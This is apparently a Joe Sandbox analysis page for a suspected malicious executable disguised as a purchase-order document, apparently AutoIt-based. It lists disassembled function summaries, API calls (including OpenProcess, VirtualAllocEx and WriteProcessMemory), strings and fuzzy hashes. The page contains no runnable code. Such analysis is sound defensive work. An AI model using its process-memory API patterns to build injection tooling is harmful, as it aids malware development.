Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 7dbab17680c4c3a629cbe0d5a65dc6fa1cd06d32e488a280efcaecc1d674e19e
Instruction ID: 36eecdb303f24a5080bf07d7fee4d4d44e64a6f04fb4b02385b1ca37fae30a35
Opcode Fuzzy Hash: 7dbab17680c4c3a629cbe0d5a65dc6fa1cd06d32e488a280efcaecc1d674e19e
Instruction Fuzzy Hash: 42F04F39142312FBDB214FA49D49F563B6DEF8A761F114815F945C6291CA70DC80CAA0

Function 001A1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001A102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001A1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001A1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001A104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001A1062

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: fabe85b325c16d688c742479f256530f24b35262516c1a1a91faf79f8ad9d7bb
Instruction ID: 729f6a2802812dce4a6cae013d444cf7baf37c0e6f94bfc4944f4a241ab00c36
Opcode Fuzzy Hash: fabe85b325c16d688c742479f256530f24b35262516c1a1a91faf79f8ad9d7bb
Instruction Fuzzy Hash: A2F06239142312FBDB215FA4ED49F563B6DFF8A761F210815F945C7290CB70D880CAA0

Function 001B030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B0324
CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B0331
CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B033E
CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B034B
CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B0358
CloseHandle.KERNEL32(?,?,?,?,001B017D,?,001B32FC,?,00000001,00182592,?), ref: 001B0365

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 4139a9aaaeba43733d9d6db862cf46174b5ecc8183b672567fa7364dc07c1c32
Instruction ID: 453291862663ee58c0ed70cd700c3788c9a45f121f702e46ace81d0ab0337ce6
Opcode Fuzzy Hash: 4139a9aaaeba43733d9d6db862cf46174b5ecc8183b672567fa7364dc07c1c32
Instruction Fuzzy Hash: 6901EA72801B059FCB32AF66D880843FBF9BF603053058A3FD19252930C3B1A988CF80

Function 0017D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0017D752

Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0

_free.LIBCMT ref: 0017D764
_free.LIBCMT ref: 0017D776
_free.LIBCMT ref: 0017D788
_free.LIBCMT ref: 0017D79A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dbc1e45fc0c0881bf4e9ccf3235187f37d02c9ebddf08927e560bceabeae277d
Instruction ID: 91e9830c22ce2dfae0f5f954200b9d5d88e3e6221c7eddfcf762b7f6a86b3b2d
Opcode Fuzzy Hash: dbc1e45fc0c0881bf4e9ccf3235187f37d02c9ebddf08927e560bceabeae277d
Instruction Fuzzy Hash: 20F04F72540318ABC625EB78F9C6C16B7FDBF44318BA88805F14CE7502C730FC818664

Function 001A5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 001A5C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 001A5C6F
MessageBeep.USER32(00000000), ref: 001A5C87
KillTimer.USER32(?,0000040A), ref: 001A5CA3
EndDialog.USER32(?,00000001), ref: 001A5CBD

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 132f0a60f5e30e66a0988a06fa393d8ddbd5d29b07ffa53ffe3c57820554d8e3
Instruction ID: 014904c14267b7efe5cfc513c88cb3bd64970399f87b96f4ecd4cfe7dbed1a82
Opcode Fuzzy Hash: 132f0a60f5e30e66a0988a06fa393d8ddbd5d29b07ffa53ffe3c57820554d8e3
Instruction Fuzzy Hash: 0601D634501B04ABEB215B10ED4EFA677BDFB01B15F00065AA583A14E4DBF0A984CA90

Function 001722A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001722BE

Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0

_free.LIBCMT ref: 001722D0
_free.LIBCMT ref: 001722E3
_free.LIBCMT ref: 001722F4
_free.LIBCMT ref: 00172305

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f3f48c3bebc11e85c1243938bc4d2c1065e58b317cb11f5e8427c1262b8373c8
Instruction ID: 9f4cf643265d4b048a2883b88d2e7d46626ad17dcfb32c570f7eeb5e2434eafe
Opcode Fuzzy Hash: f3f48c3bebc11e85c1243938bc4d2c1065e58b317cb11f5e8427c1262b8373c8
Instruction Fuzzy Hash: ABF030B04012308BC712AF64BC4A8887B74B738750B25C606F518D32B2CF7504A39BA4

Function 001595C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 001595D4
StrokeAndFillPath.GDI32(?,?,001971F7,00000000,?,?,?), ref: 001595F0
SelectObject.GDI32(?,00000000), ref: 00159603
DeleteObject.GDI32 ref: 00159616
StrokePath.GDI32(?), ref: 00159631

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: d7340321d79ebb2286abc6f703fc636fc4db473c6bcdedc89a0d3abb955c1fb9
Instruction ID: c75c8f9f451ff6bad523055e8a3fe5321e563a94fd3cd5504cce3c80d8931b84
Opcode Fuzzy Hash: d7340321d79ebb2286abc6f703fc636fc4db473c6bcdedc89a0d3abb955c1fb9
Instruction Fuzzy Hash: 9EF03C34007385EBDB165F69FD1C7A43B61AB10322F04C215FA35594F0CB3089A9DFA1

Function 00170F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 001710F9
__freea.LIBCMT ref: 00171117

Part of subcall function 00171537: _free.LIBCMT ref: 0017154F

Strings

am/pm, xrefs: 0017117A
a/p, xrefs: 001711DE

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: c4c50930bb9c7eb98bb061fd4971f7b9ebab1a2297cad578519205c51eaa33be
Instruction ID: 6c0b2c099d87182f4ff16dc7ebffa8ca8cc38285531f0bc0942887707fb801ee
Opcode Fuzzy Hash: c4c50930bb9c7eb98bb061fd4971f7b9ebab1a2297cad578519205c51eaa33be
Instruction Fuzzy Hash: 60D11231900206EADB289F6CC895BFEB7B5FF05720F29C159E90DAB651D3359D80CBA1

Function 001C61D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00160242: EnterCriticalSection.KERNEL32(0021070C,00211884,?,?,0015198B,00212518,?,?,?,001412F9,00000000), ref: 0016024D
Part of subcall function 00160242: LeaveCriticalSection.KERNEL32(0021070C,?,0015198B,00212518,?,?,?,001412F9,00000000), ref: 0016028A

Part of subcall function 001600A3: __onexit.LIBCMT ref: 001600A9

__Init_thread_footer.LIBCMT ref: 001C6238

Part of subcall function 001601F8: EnterCriticalSection.KERNEL32(0021070C,?,?,00158747,00212514), ref: 00160202
Part of subcall function 001601F8: LeaveCriticalSection.KERNEL32(0021070C,?,00158747,00212514), ref: 00160235

Part of subcall function 001B359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001B35E4
Part of subcall function 001B359C: LoadStringW.USER32(00212390,?,00000FFF,?), ref: 001B360A

Strings

x#!, xrefs: 001C636F
x#!, xrefs: 001C633A
x#!, xrefs: 001C6353

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#!$x#!$x#!
API String ID: 1072379062-1188481307
Opcode ID: e40666b9e06393301e745f9437688d15699ff32b023f37174fcee374c4277ce0
Instruction ID: 6640d66aa173ab0a0f924f4637b7b6b256548efe18c225b5c36e23d2762b4752
Opcode Fuzzy Hash: e40666b9e06393301e745f9437688d15699ff32b023f37174fcee374c4277ce0
Instruction Fuzzy Hash: E2C16971A00109ABCB24DF98C891EAEB7B9EF68340F14806DF9159B291DB70ED55CB90

Function 001C7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00160242: EnterCriticalSection.KERNEL32(0021070C,00211884,?,?,0015198B,00212518,?,?,?,001412F9,00000000), ref: 0016024D
Part of subcall function 00160242: LeaveCriticalSection.KERNEL32(0021070C,?,0015198B,00212518,?,?,?,001412F9,00000000), ref: 0016028A

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

Part of subcall function 001600A3: __onexit.LIBCMT ref: 001600A9

__Init_thread_footer.LIBCMT ref: 001C7BFB

Part of subcall function 001601F8: EnterCriticalSection.KERNEL32(0021070C,?,?,00158747,00212514), ref: 00160202
Part of subcall function 001601F8: LeaveCriticalSection.KERNEL32(0021070C,?,00158747,00212514), ref: 00160235

Strings

5, xrefs: 001C7C78
Variable must be of type 'Object'., xrefs: 001C7C3A
G, xrefs: 001C7C7F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 2b9e3998f04bbd0f4ab4911fbfc1702cf374c603953d9d64570343ec877d49ba
Instruction ID: 409989bda0903a0f302c15e717b2f7a3a37e254df0e2d2e3e9c74889ca42df0a
Opcode Fuzzy Hash: 2b9e3998f04bbd0f4ab4911fbfc1702cf374c603953d9d64570343ec877d49ba
Instruction Fuzzy Hash: 77915A70A04209AFCB14EF94D891EBDB7B2AF69300F54805DF8069B292DBB1EE45DB51

Function 001A2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001AB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001A21D0,?,?,00000034,00000800,?,00000034), ref: 001AB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001A2760

Part of subcall function 001AB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001A21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 001AB3F8

Part of subcall function 001AB32A: GetWindowThreadProcessId.USER32(?,?), ref: 001AB355
Part of subcall function 001AB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,001A2194,00000034,?,?,00001004,00000000,00000000), ref: 001AB365
Part of subcall function 001AB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,001A2194,00000034,?,?,00001004,00000000,00000000), ref: 001AB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001A27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001A281A

Strings

@, xrefs: 001A2832

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 08d33ada49225c7ee8b6a5afa9991417f3cb84114bb28f8d03a74277def9c077
Instruction ID: 749c1f983208ed85fa35b5715582d1531fc416ee48ea5c42dfdef7e1f5811108
Opcode Fuzzy Hash: 08d33ada49225c7ee8b6a5afa9991417f3cb84114bb28f8d03a74277def9c077
Instruction Fuzzy Hash: FB413D76901218BFDB10DFA4CD81AEEBBB8EF1A300F004055FA55B7191DB706E85CBA0

Function 0017172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO-DOC1522025-12.exe,00000104), ref: 00171769
_free.LIBCMT ref: 00171834
_free.LIBCMT ref: 0017183E

Strings

C:\Users\user\Desktop\PO-DOC1522025-12.exe, xrefs: 00171760, 00171767, 00171796, 001717CE

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\PO-DOC1522025-12.exe
API String ID: 2506810119-3414669749
Opcode ID: 08d7852d25cec00e960b4283675515078ac58d08f7642d51255db3fdebae6fd8
Instruction ID: fce55722430450fa2887245692c80eaf782a493cd68275f2ef630f8c73db744c
Opcode Fuzzy Hash: 08d7852d25cec00e960b4283675515078ac58d08f7642d51255db3fdebae6fd8
Instruction Fuzzy Hash: 2E316F71A40218BBDB25DF999885D9EBBFCEBA5310B14816AE90897211DB708A41CB91

Function 001AC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001AC306
DeleteMenu.USER32(?,00000007,00000000), ref: 001AC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00211990,00B858C8), ref: 001AC395

Strings

0, xrefs: 001AC2DF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 64e57ecb694033376104d46c54aa31e7701561c6e94279b43821aab5ab378cb9
Instruction ID: dcb35d537a9338c044de16deb91eecc945f4c4132f54ed1fb575526816807746
Opcode Fuzzy Hash: 64e57ecb694033376104d46c54aa31e7701561c6e94279b43821aab5ab378cb9
Instruction Fuzzy Hash: CA41C5352083019FDB24DF25D884B6BBBE4BF96310F008A1DF965972D1D770E904CB92

Function 001D4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001DCC08,00000000,?,?,?,?), ref: 001D44AA
GetWindowLongW.USER32 ref: 001D44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 001D44D7

Strings

SysTreeView32, xrefs: 001D447C

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: f6bcb5ae5029a9092c618e4b3bdccdc48eae330685aa43be84136e485ab53025
Instruction ID: 8e42c2e49ac225311bd2e7b0bfa6f2bdd94db44df63a4ec09883645e99bfebeb
Opcode Fuzzy Hash: f6bcb5ae5029a9092c618e4b3bdccdc48eae330685aa43be84136e485ab53025
Instruction Fuzzy Hash: 77319E31210206AFDF208F38DC45BEA77A9EB09334F204716F975922E0D770EC909750

Function 001C304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001C335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,001C3077,?,?), ref: 001C3378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001C307A
_wcslen.LIBCMT ref: 001C309B
htons.WSOCK32(00000000,?,?,00000000), ref: 001C3106

Strings

255.255.255.255, xrefs: 001C3095, 001C309A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 06a0bb487772afe906e6444c99d9217cb0a448d186d216e34b932f46e3e281fc
Instruction ID: 173945ad76c0ba0ad476d1e40bf2277cf21ce2eb61041209446e18ccbed591fd
Opcode Fuzzy Hash: 06a0bb487772afe906e6444c99d9217cb0a448d186d216e34b932f46e3e281fc
Instruction Fuzzy Hash: 8731E7362002059FCB10CF68C485FAA77E0EF64318F29C05DE9268B792DB32DE41C761

Function 001D4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001D4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001D4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001D471A

Strings

msctls_updown32, xrefs: 001D4684

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 4f4987ad6de79eb9d83c8f24e51d908e53108001302b15b80841cf8238937817
Instruction ID: de7d3403f66670bc92df98a2b06595a1a37971c619ebfcbacf42dd74421514e7
Opcode Fuzzy Hash: 4f4987ad6de79eb9d83c8f24e51d908e53108001302b15b80841cf8238937817
Instruction Fuzzy Hash: 0E216DB5601209AFDB10DF64DCC5DB737ADEF5A3A4B04055AFA009B3A1CB31EC61CAA0

Function 001A95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001A961D

Strings

#OnAutoItStartRegister, xrefs: 001A95F3
#requireadmin, xrefs: 001A95D9
#notrayicon, xrefs: 001A95B7

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

